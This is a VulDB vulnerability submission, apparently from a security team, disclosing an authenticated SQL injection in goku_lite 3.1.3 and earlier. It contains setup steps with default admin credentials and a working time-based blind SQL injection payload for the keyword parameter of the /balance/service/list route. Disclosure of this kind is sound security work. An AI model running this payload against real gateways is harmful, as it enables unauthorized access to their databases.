Submeter #51889: goku_lite <= 3.1.3 Authenticated SQL injection via /balance/service/list route and keyword parameterinformação

Títulogoku_lite <= 3.1.3 Authenticated SQL injection via /balance/service/list route and keyword parameter
Descrição# Get start repo: ** https://github.com/eolinker/goku_lite ** - Execute docker command - Start goku ```bash docker run docker run -dt -p 7000:7000 -v /app/goku-ce/work:/app/goku-ce/console/work -e GOKU_ADMIN_PASSWORD=123456 --network=goku-ce --ip 172.18.12.2 --name goku-ce-console eolinker/goku-api-gateway-ce-console ``` user/pass: admin/123456 # vulnerability goku_lite <= 3.1.3 Authenticated SQL injection via /balance/service/list route and keyword parameter use admin/123456 to login POC: Request URL: http://testlink:7000/balance/service/list Request Method: POST PostData: keyword=' AND 9783=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- hyJG Use sqlmap : ![](https://c2.im5i.com/2022/11/11/26Jg5.png) ![](https://c2.im5i.com/2022/11/11/26c56.png) Reported by QSec-Team of Network Security Department at Qi'anxin Group on 2022-11-11. Please show QSec-Team in the detail of cve page. Thanks, QSec-Team
Utilizador
 qsec (UID 33968)
Submissão11/11/2022 12h24 (há 4 anos)
Moderação11/11/2022 13h10 (46 minutes later)
EstadoAceite
Entrada VulDB213453 [eolinker goku_lite /balance/service/list route/keyword Injeção SQL]
Pontos17

VoltarVisão GeralPróximo

Do you know our Splunk app?

Download it now for free!